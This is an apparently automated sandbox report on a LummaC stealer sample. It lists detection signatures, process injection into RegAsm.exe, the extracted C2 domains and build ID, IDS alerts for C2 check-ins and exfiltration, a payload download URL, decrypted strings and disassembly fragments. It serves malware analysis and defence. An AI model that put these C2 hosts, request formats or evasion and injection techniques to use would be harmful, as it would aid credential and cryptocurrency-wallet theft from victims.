Edit tour

Windows Analysis Report
nlJ2sNaZVi.exe

Overview

General Information

Sample name:	nlJ2sNaZVi.exe renamed because original name is a hash value
Original sample name:	5e443f31b2cf8b956afec50ad5c0f839.exe
Analysis ID:	1555620
MD5:	5e443f31b2cf8b956afec50ad5c0f839
SHA1:	206caac0c2d6e47246f0c3df16fa5c72172e6bfd
SHA256:	abe7949458ebfbdb53ad04c602bca49e30f346431b730a005c0ff3c59e06538e
Tags:	exeuser-abuse_ch
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

.NET source code contains very large strings

.NET source code references suspicious native API functions

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Compiles code for process injection (via .Net compiler)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Machine Learning detection for sample

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Sigma detected: Dot net compiler compiles file from suspicious location

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

nlJ2sNaZVi.exe (PID: 5700 cmdline: "C:\Users\user\Desktop\nlJ2sNaZVi.exe" MD5: 5E443F31B2CF8B956AFEC50AD5C0F839)

csc.exe (PID: 2892 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)

conhost.exe (PID: 6568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 6524 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBEB5.tmp" "c:\Users\user\AppData\Local\Temp\v0t1l0co\CSC65BF410C392B47AC8396E849E0F657FD.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)

RegAsm.exe (PID: 6484 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["brownieyuz.sbs", "relalingj.sbs", "thinkyyokej.sbs", "tamedgeesy.sbs", "rottieud.sbs", "netwrokenb.cyou", "repostebhu.sbs", "ducksringjk.sbs", "explainvees.sbs"], "Build id": "yau6Na--6928154717"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
Process Memory Space: nlJ2sNaZVi.exe PID: 5700	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegAsm.exe PID: 6484	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Sigma Signatures

System Summary

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Source: Process started

Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\nlJ2sNaZVi.exe", ParentImage: C:\Users\user\Desktop\nlJ2sNaZVi.exe, ParentProcessId: 5700, ParentProcessName: nlJ2sNaZVi.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.cmdline", ProcessId: 2892, ProcessName: csc.exe

Sigma detected: Dynamic CSharp Compile Artefact

Source: File created

Author: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\nlJ2sNaZVi.exe, ProcessId: 5700, TargetFilename: C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.cmdline

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\nlJ2sNaZVi.exe", ParentImage: C:\Users\user\Desktop\nlJ2sNaZVi.exe, ParentProcessId: 5700, ParentProcessName: nlJ2sNaZVi.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.cmdline", ProcessId: 2892, ProcessName: csc.exe

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-14T08:08:37.356363+0100	2022930	1	A Network Trojan was detected	4.245.163.56	443	192.168.2.5	49714	TCP
2024-11-14T08:09:16.237232+0100	2022930	1	A Network Trojan was detected	4.245.163.56	443	192.168.2.5	49912	TCP

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-14T08:08:21.526630+0100	2028371	3	Unknown Traffic	192.168.2.5	49705	188.114.96.3	443	TCP
2024-11-14T08:08:23.248794+0100	2028371	3	Unknown Traffic	192.168.2.5	49706	104.102.49.254	443	TCP
2024-11-14T08:08:24.766719+0100	2028371	3	Unknown Traffic	192.168.2.5	49707	188.114.96.3	443	TCP
2024-11-14T08:08:26.182744+0100	2028371	3	Unknown Traffic	192.168.2.5	49708	188.114.96.3	443	TCP
2024-11-14T08:08:27.485559+0100	2028371	3	Unknown Traffic	192.168.2.5	49709	188.114.96.3	443	TCP
2024-11-14T08:08:28.661337+0100	2028371	3	Unknown Traffic	192.168.2.5	49710	188.114.96.3	443	TCP
2024-11-14T08:08:30.074954+0100	2028371	3	Unknown Traffic	192.168.2.5	49711	188.114.96.3	443	TCP
2024-11-14T08:08:31.420994+0100	2028371	3	Unknown Traffic	192.168.2.5	49712	188.114.96.3	443	TCP
2024-11-14T08:08:32.961765+0100	2028371	3	Unknown Traffic	192.168.2.5	49713	188.114.96.3	443	TCP
2024-11-14T08:08:36.008106+0100	2028371	3	Unknown Traffic	192.168.2.5	49715	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-14T08:08:22.073793+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49705	188.114.96.3	443	TCP
2024-11-14T08:08:25.512984+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49707	188.114.96.3	443	TCP
2024-11-14T08:08:26.697121+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49708	188.114.96.3	443	TCP
2024-11-14T08:08:36.490906+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49715	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-14T08:08:22.073793+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49705	188.114.96.3	443	TCP
2024-11-14T08:08:25.512984+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49707	188.114.96.3	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-14T08:08:26.697121+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49708	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-14T08:08:24.766719+0100	2057416	1	Domain Observed Used for C2 Detected	192.168.2.5	49707	188.114.96.3	443	TCP
2024-11-14T08:08:26.182744+0100	2057416	1	Domain Observed Used for C2 Detected	192.168.2.5	49708	188.114.96.3	443	TCP
2024-11-14T08:08:27.485559+0100	2057416	1	Domain Observed Used for C2 Detected	192.168.2.5	49709	188.114.96.3	443	TCP
2024-11-14T08:08:28.661337+0100	2057416	1	Domain Observed Used for C2 Detected	192.168.2.5	49710	188.114.96.3	443	TCP
2024-11-14T08:08:30.074954+0100	2057416	1	Domain Observed Used for C2 Detected	192.168.2.5	49711	188.114.96.3	443	TCP
2024-11-14T08:08:31.420994+0100	2057416	1	Domain Observed Used for C2 Detected	192.168.2.5	49712	188.114.96.3	443	TCP
2024-11-14T08:08:32.961765+0100	2057416	1	Domain Observed Used for C2 Detected	192.168.2.5	49713	188.114.96.3	443	TCP
2024-11-14T08:08:36.008106+0100	2057416	1	Domain Observed Used for C2 Detected	192.168.2.5	49715	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (netwrokenb .cyou in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-14T08:08:21.526630+0100	2057411	1	Domain Observed Used for C2 Detected	192.168.2.5	49705	188.114.96.3	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (brownieyuz .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-14T08:08:22.197367+0100	2057334	1	Domain Observed Used for C2 Detected	192.168.2.5	49300	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ducksringjk .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-14T08:08:22.150149+0100	2057338	1	Domain Observed Used for C2 Detected	192.168.2.5	53035	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (explainvees .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-14T08:08:22.173799+0100	2057340	1	Domain Observed Used for C2 Detected	192.168.2.5	55432	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (marshal-zhukov .com)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-14T08:08:23.976547+0100	2057415	1	Domain Observed Used for C2 Detected	192.168.2.5	49466	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (netwrokenb .cyou)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-14T08:08:20.850724+0100	2057410	1	Domain Observed Used for C2 Detected	192.168.2.5	63925	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (relalingj .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-14T08:08:22.258707+0100	2057344	1	Domain Observed Used for C2 Detected	192.168.2.5	52893	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (repostebhu .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-14T08:08:22.079251+0100	2057346	1	Domain Observed Used for C2 Detected	192.168.2.5	51047	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rottieud .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-14T08:08:22.224280+0100	2057348	1	Domain Observed Used for C2 Detected	192.168.2.5	55898	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tamedgeesy .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-14T08:08:22.309758+0100	2057350	1	Domain Observed Used for C2 Detected	192.168.2.5	51358	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thinkyyokej .sbs)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-14T08:08:22.103876+0100	2057354	1	Domain Observed Used for C2 Detected	192.168.2.5	62596	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-14T08:08:29.329609+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49710	188.114.96.3	443	TCP

ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-14T08:08:18.652472+0100	2800029	1	Attempted User Privilege Gain	147.45.44.131	80	192.168.2.5	49704	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-14T08:08:23.854551+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.5	49706	104.102.49.254	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: nlJ2sNaZVi.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://marshal-zhukov.com/apiya	Avira URL Cloud: Label: malware
Source: https://marshal-zhukov.com:443/apiicrosoft	Avira URL Cloud: Label: malware
Source: http://147.45.44.131/infopage/tbh75.exe	Avira URL Cloud: Label: malware
Source: https://marshal-zhukov.com:443/apiK	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.dll

Avira: detection malicious, Label: HEUR/AGEN.1300034

Found malware configuration

Source: 5.2.RegAsm.exe.400000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["brownieyuz.sbs", "relalingj.sbs", "thinkyyokej.sbs", "tamedgeesy.sbs", "rottieud.sbs", "netwrokenb.cyou", "repostebhu.sbs", "ducksringjk.sbs", "explainvees.sbs"], "Build id": "yau6Na--6928154717"}

Multi AV Scanner detection for submitted file

Source: nlJ2sNaZVi.exe

ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.dll

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: nlJ2sNaZVi.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: tamedgeesy.sbs
Source: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: relalingj.sbs
Source: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: rottieud.sbs
Source: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: brownieyuz.sbs
Source: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: explainvees.sbs
Source: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: ducksringjk.sbs
Source: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: thinkyyokej.sbs
Source: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: repostebhu.sbs
Source: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: netwrokenb.cyou
Source: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000005.00000002.2208959729.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: yau6Na--6928154717

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 5_2_00413F3B CryptUnprotectData,

5_2_00413F3B

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49715 version: TLS 1.2

Source: nlJ2sNaZVi.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.pdbu source: nlJ2sNaZVi.exe, 00000000.00000002.2051982616.0000000001022000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: $]q8C:\Users\user\AppData\Local\Temp\v0t1l0co\v0t1l0co.pdb source: nlJ2sNaZVi.exe, 00000000.00000002.2052624762.0000000003034000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [edi], cx	5_2_004180C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], cl	5_2_0040D922
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 50DC24C7h	5_2_0043B930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, eax	5_2_00409A40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ecx+0000009Ch]	5_2_00427A08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, eax	5_2_0042731B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [esi+eax]	5_2_00437D21
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 9ABDB589h	5_2_00421640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-0000009Ch]	5_2_00421640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 1AFFABDAh	5_2_0043B760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h	5_2_004138E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	5_2_004138E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, eax	5_2_00424166
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	5_2_00424166
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx esi, byte ptr [eax]	5_2_00422171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx], 00000000h	5_2_00422171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx esi, byte ptr [eax]	5_2_00422171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx-31FA6CDBh]	5_2_004161C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	5_2_004201F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	5_2_004259A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [004425F0h]	5_2_0041FA5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	5_2_00423A11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax+49CC0A96h]	5_2_00426A19
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax+49CC0A96h]	5_2_00426865
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], bl	5_2_004092C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, ecx	5_2_00421AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp esi	5_2_0040AAEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx-31FA6CDBh]	5_2_004161C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h	5_2_00416367
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+34h]	5_2_00416367
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edx], al	5_2_00428379
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	5_2_00423BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	5_2_004253E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], FD743AC4h	5_2_00435B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, ecx	5_2_00422BAB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], B62B8D10h	5_2_00422BAB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edx], al	5_2_00428447
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], B62B8D10h	5_2_00424457
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edx], al	5_2_00428459
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	5_2_00420470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edx], al	5_2_0042840A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 3E416E49h	5_2_00435CE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+02ACBD5Ah]	5_2_00435CE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edx*8], 3E416E49h	5_2_00435CE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+edi+69EFFF83h]	5_2_00418C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ecx+0000009Ch]	5_2_00427D4F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ebx+edx], 00000000h	5_2_0040BD04
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	5_2_0042451F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	5_2_0041D520
